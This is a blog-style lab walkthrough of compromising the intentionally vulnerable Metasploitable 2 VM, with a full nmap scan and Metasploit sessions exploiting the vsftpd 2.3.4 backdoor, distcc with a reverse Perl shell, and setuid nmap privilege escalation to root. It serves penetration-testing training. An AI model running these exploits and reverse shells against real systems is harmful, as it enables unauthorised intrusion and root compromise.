Monday, November 11, 2013

Metasploitable 2 - Walkthrough

There is a second, newer release to Metasploitable (2), which is downloadble from here:

http://sourceforge.net/projects/metasploitable/

It has most of the services from the old edition and quite a bunch of new ones.

Here is the NMAP scan:

root@kali:~# nmap -sS -A 192.168.1.23 -p1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-10 08:21 CET
Nmap scan report for 192.168.1.23
Host is up (0.00051s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-10T07:23:51+00:00; -2s from local time.
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      37592/tcp  mountd
|   100005  1,2,3      38749/udp  mountd
|   100021  1,3,4      48184/udp  nlockmgr
|   100021  1,3,4      49513/tcp  nlockmgr
|   100024  1          41287/tcp  status
|_  100024  1          48160/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: )%{aRYF2h4j:$B`>RcyY
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    Unknown security type (33554432)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Throttled: Reconnecting too fast) -Email admin@Metasploitable.LAN for more information.
6697/tcp  open  irc         Unreal ircd
|_irc-info: ERROR: Closing Link: [192.168.1.17] (Too many unknown connections from your IP)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34829/tcp open  unknown
37592/tcp open  mountd      1-3 (RPC #100005)
41287/tcp open  status      1 (RPC #100024)
49513/tcp open  nlockmgr    1-4 (RPC #100021)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      37592/tcp  mountd
|   100005  1,2,3      38749/udp  mountd
|   100021  1,3,4      48184/udp  nlockmgr
|   100021  1,3,4      49513/tcp  nlockmgr
|   100024  1          41287/tcp  status
|_  100024  1          48160/udp  status
MAC Address: 00:0C:29:A1:61:F8 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-10T02:23:49-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.1.23

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.43 seconds

Again, as there are way too many options here, and doing it with MSF is easy, I will show two methods, and will the rest to you.

Method 1 - via FTP

After some search we can find that there is an MSF exploit for the VSFTP service installed:

https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

Running it we get root shell immediately, cause most likely the service is running with root privileges.

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.23     yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
id
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.17:34683 -> 192.168.1.23:6200) at 2013-11-11 21:24:13 +0100

uid=0(root) gid=0(root)
ls /root
Desktop
reset_logs.sh
vnc.log


Method 2 - distcc + nmap

This time I picked up the following exploit (again, Google search on the service):

https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.23     yes       The target address
   RPORT  3632             yes       The target port


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(distcc_exec) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 2 opened (192.168.1.17:4444 -> 192.168.1.23:60752) at 2013-11-11 21:27:52 +0100


id
uid=1(daemon) gid=1(daemon) groups=1(daemon)


You can place the session to background with CTRL + Z. As for privilege escalation I choose this, and it worked:

http://www.rapid7.com/db/modules/exploit/unix/local/setuid_nmap

msf exploit(setuid_nmap) > show options

Module options (exploit/unix/local/setuid_nmap):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   ExtraArgs                     no        Extra arguments to pass to Nmap (e.g. --datadir)
   Nmap         /usr/bin/nmap    yes       Path to setuid nmap executable
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files


Exploit target:

   Id  Name
   --  ----
   0   Command payload


msf exploit(setuid_nmap) > set SESSION 3
SESSION => 3
msf exploit(setuid_nmap) > exploit

[*] Dropping lua /tmp/ckhDpdXy.nse
[*] Started reverse double handler
id
[*] running
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qDkuWOTbsfd2gBW5;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nqDkuWOTbsfd2gBW5\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.23:43019) at 2013-11-11 21:34:51 +0100

uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
ls /root
Desktop
reset_logs.sh
vnc.log


That's all folks!
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)